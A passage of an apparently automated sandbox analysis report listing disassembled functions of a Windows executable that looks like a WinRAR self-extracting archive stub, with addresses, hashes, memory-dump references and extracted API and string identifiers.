                                                                                                                                                                          • Opcode ID: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
                                                                                                                                                                          • Instruction ID: bfdc1ed6f4540f971bd7dd9b985cf0ce416b7dc9e4c3d1b9c44a9a1ef614442f
                                                                                                                                                                          • Opcode Fuzzy Hash: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
                                                                                                                                                                          • Instruction Fuzzy Hash: BFD1BB72A181D04EE312CB79A4144BEBFB5E71D30DB8A8262DFD55370AC62EE502DB60
                                                                                                                                                                          Function 00007FF70ECDB948 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
                                                                                                                                                                          • Instruction ID: 8f7d24f0737fef30bd8adb53bca6773bfc62a6023289d8f3244ce03951e30cf7
                                                                                                                                                                          • Opcode Fuzzy Hash: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
                                                                                                                                                                          • Instruction Fuzzy Hash: CA612622B1C1D169EB01DF7589444FEBFB1AB097847868072DE9E5364ACB3EE905CB20
                                                                                                                                                                          Function 00007FF70ED08DF0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 925daada8ef65e2677460b522fd56a987e460062fe4befbd33bf430193fcb847
                                                                                                                                                                          • Instruction ID: 9051f866324078bf5e52c8bf55a2f270227988adbf360944197ff925f3b05a98
                                                                                                                                                                          • Opcode Fuzzy Hash: 925daada8ef65e2677460b522fd56a987e460062fe4befbd33bf430193fcb847
                                                                                                                                                                          • Instruction Fuzzy Hash: 2EF06275B282958BDBA89F39A842629B7D0FB08380F80907AD68D83B04DB3D94608F14
                                                                                                                                                                          Function 00007FF70ECF6B24 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
                                                                                                                                                                          • Instruction ID: c7ad701bee1651797137c5d3256a415a879d41a066132ebc663ad5dee9b33ce9
                                                                                                                                                                          • Opcode Fuzzy Hash: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
                                                                                                                                                                          • Instruction Fuzzy Hash: B6A0023591CD12E4E648AF00EC70135E330FF50700BD40032D44D820A1DF3DE440D360
                                                                                                                                                                          Function 00007FF70ECF61E0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                          • API String ID: 2565136772-3242537097
                                                                                                                                                                          • Opcode ID: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
                                                                                                                                                                          • Instruction ID: c71835c6b17d8547a6f5a156224fc33aa498362e86fb3ed2a3b75460cda9349a
                                                                                                                                                                          • Opcode Fuzzy Hash: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
                                                                                                                                                                          • Instruction Fuzzy Hash: CC212A20E1DB07A5FE15BB61ECA4376E2A0EF44B40FC81036D90E436A1EF3DA4458360
                                                                                                                                                                          Function 00007FF70ECEDF84 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                                                                                                          • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                                                                                          • API String ID: 431506467-1315819833
                                                                                                                                                                          • Opcode ID: a5c5738898e15f6e19ffd60a10583bda7f1b196946b6e6664251b414cb79581e
                                                                                                                                                                          • Instruction ID: a6af59bebb3c43c2ee1ec6b81dc4eb0a48cc1f8b46746ecc596faed9b367a538
                                                                                                                                                                          • Opcode Fuzzy Hash: a5c5738898e15f6e19ffd60a10583bda7f1b196946b6e6664251b414cb79581e
                                                                                                                                                                          • Instruction Fuzzy Hash: A9B1B162F19B82A9FB00EB64D8442AEB362EF45798F804235DA5C27BD9DF3DE445C314
                                                                                                                                                                          Function 00007FF70ECEAB10 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                                                                                                                          • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                          • API String ID: 2868844859-1533471033
                                                                                                                                                                          • Opcode ID: dbdbaf2d6a176f92c1fb144b878dc6d6ca85ac90d776e93b087ee90a44d95b63
                                                                                                                                                                          • Instruction ID: 1c46e5e791914c21f7c09d37e379147537f3bed6ffaaee6161310309e7817772
                                                                                                                                                                          • Opcode Fuzzy Hash: dbdbaf2d6a176f92c1fb144b878dc6d6ca85ac90d776e93b087ee90a44d95b63
                                                                                                                                                                          • Instruction Fuzzy Hash: 4381B162F18A42A9FB00EBA5D8502EEB371AF44798F844235DE1D1779AEF3DD506C324
                                                                                                                                                                          Function 00007FF70ED01B60 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                          • API String ID: 3215553584-2617248754
                                                                                                                                                                          • Opcode ID: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
                                                                                                                                                                          • Instruction ID: 92b72b19d60502bbc536adfd2ca60d4321e22d7615bc974ffbe0379487cfbd86
                                                                                                                                                                          • Opcode Fuzzy Hash: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
                                                                                                                                                                          • Instruction Fuzzy Hash: 1041A932B09B4599EB10DB21E8517AD73A4EF08798F984136EE5C83B94DF39D025C350
                                                                                                                                                                          Function 00007FF70ECF2EE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                                                                                                          • String ID: STATIC
                                                                                                                                                                          • API String ID: 2845197485-1882779555
                                                                                                                                                                          • Opcode ID: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
                                                                                                                                                                          • Instruction ID: b787971f36bdca13466dc612bd0396ef43d34fdb4661f32abdb4e6d351bf7bf7
                                                                                                                                                                          • Opcode Fuzzy Hash: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
                                                                                                                                                                          • Instruction Fuzzy Hash: E531A335B1864696EA24BB21ED647FAA3A1FF89BC4F840031DD4D077A5DF3DE4068720
                                                                                                                                                                          Function 00007FF70ECD80B0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 444COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                          • String ID: UNC$\\?\
                                                                                                                                                                          • API String ID: 4097890229-253988292
                                                                                                                                                                          • Opcode ID: 00252a679874104d1822cc98057d8594556e629aee441fe9c1d421cf9e6faeae
                                                                                                                                                                          • Instruction ID: 797541aeb58f9d92b236b9b570930cf359bd29d55efdc5ad3431a652b5a07fb8
                                                                                                                                                                          • Opcode Fuzzy Hash: 00252a679874104d1822cc98057d8594556e629aee441fe9c1d421cf9e6faeae
                                                                                                                                                                          • Instruction Fuzzy Hash: C412DF23B0DB42A0EB14EB65E8541AEA371EF41B98F904232DA5D07BE9DF3ED545C360
                                                                                                                                                                          Function 00007FF70ECEE9E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemTextWindow
                                                                                                                                                                          • String ID: LICENSEDLG
                                                                                                                                                                          • API String ID: 2478532303-2177901306
                                                                                                                                                                          • Opcode ID: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
                                                                                                                                                                          • Instruction ID: 2d8b6a2bd7acc576d84d52189548211de0c5ab4fd239d50cf4163520d9593fc1
                                                                                                                                                                          • Opcode Fuzzy Hash: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
                                                                                                                                                                          • Instruction Fuzzy Hash: 4741AC35F0865296FB24AB21ED443BAA7A2EF84BC4F844135DD0E07BA5CF3DA5468320
                                                                                                                                                                          Function 00007FF70ECDBD30 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                          • API String ID: 2915667086-2207617598
                                                                                                                                                                          • Opcode ID: af4e49dbb55579098516a92d52c0ddb0d0e089f7b74e7f5168f5122a97df5a7b
                                                                                                                                                                          • Instruction ID: 7485ec6b329ab0745144fce07e0537991bafdb392d10c581b8f121218facfa73
                                                                                                                                                                          • Opcode Fuzzy Hash: af4e49dbb55579098516a92d52c0ddb0d0e089f7b74e7f5168f5122a97df5a7b
                                                                                                                                                                          • Instruction Fuzzy Hash: D8317220E0DB4791FA14BB15AC502B6E7A4EF54B90FC91139D95E43BA4DF3EE841C320
                                                                                                                                                                          Function 00007FF70ECEC414 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: $
                                                                                                                                                                          • API String ID: 3668304517-227171996
                                                                                                                                                                          • Opcode ID: cc90666c87694a805e4cb26fa89118b0cbad2d188fd07c00b7ebba12d4a88631
                                                                                                                                                                          • Instruction ID: 981295a9dbd636dd8447d9329b589b0f5328a06d62b61672e59250c601198c09
                                                                                                                                                                          • Opcode Fuzzy Hash: cc90666c87694a805e4cb26fa89118b0cbad2d188fd07c00b7ebba12d4a88631
                                                                                                                                                                          • Instruction Fuzzy Hash: 56F1F162F18B82A0EE00AB64D8445BEF321AF44BACF905231CA5D137D9DF7EE590D360
                                                                                                                                                                          Function 00007FF70ECF8D7C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                          • API String ID: 2940173790-393685449
                                                                                                                                                                          • Opcode ID: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
                                                                                                                                                                          • Instruction ID: a327eaf77c73e6ec0b7751b9d6db1a115a9e187b0f8676d2678a9158885174f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 1BE1B4339087829AEB14AF74D8903AEB7A0FF84748F944136EA8D57796CF39E485C710
                                                                                                                                                                          Function 00007FF70ECE1BF4 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 160COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF70ECE0AA0: CompareStringW.KERNEL32(?,?,00007FF70ECD6C19), ref: 00007FF70ECE0ABF
                                                                                                                                                                            • Part of subcall function 00007FF70ECD12BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70ECD13B6
                                                                                                                                                                            • Part of subcall function 00007FF70ECE0AD0: CompareStringW.KERNEL32 ref: 00007FF70ECE0B36
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE1DC2
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE1DC8
                                                                                                                                                                          • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70ECE1E25
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CompareString_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskswprintf
                                                                                                                                                                          • String ID: .zipx$.zx$z%s%02d
                                                                                                                                                                          • API String ID: 2859674139-515631857
                                                                                                                                                                          • Opcode ID: 2e8cc53fc1a399fcb678a14113de810c74ea7267c0bd574ae7842b24cd295462
                                                                                                                                                                          • Instruction ID: 8dce9b52980dd3dce5e13d6a589f529d3cb37f7085f17e26cb40c46184b6e47c
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e8cc53fc1a399fcb678a14113de810c74ea7267c0bd574ae7842b24cd295462
                                                                                                                                                                          • Instruction Fuzzy Hash: F171D872A19741A8EB10EF64D8913EDB361EF44788F845232EA5C47B99DF39D654C310
                                                                                                                                                                          Function 00007FF70ECFA87C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF70ECFAA83,?,?,?,00007FF70ECF87EE,?,?,?,00007FF70ECF87A9), ref: 00007FF70ECFA901
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,00007FF70ECFAA83,?,?,?,00007FF70ECF87EE,?,?,?,00007FF70ECF87A9), ref: 00007FF70ECFA90F
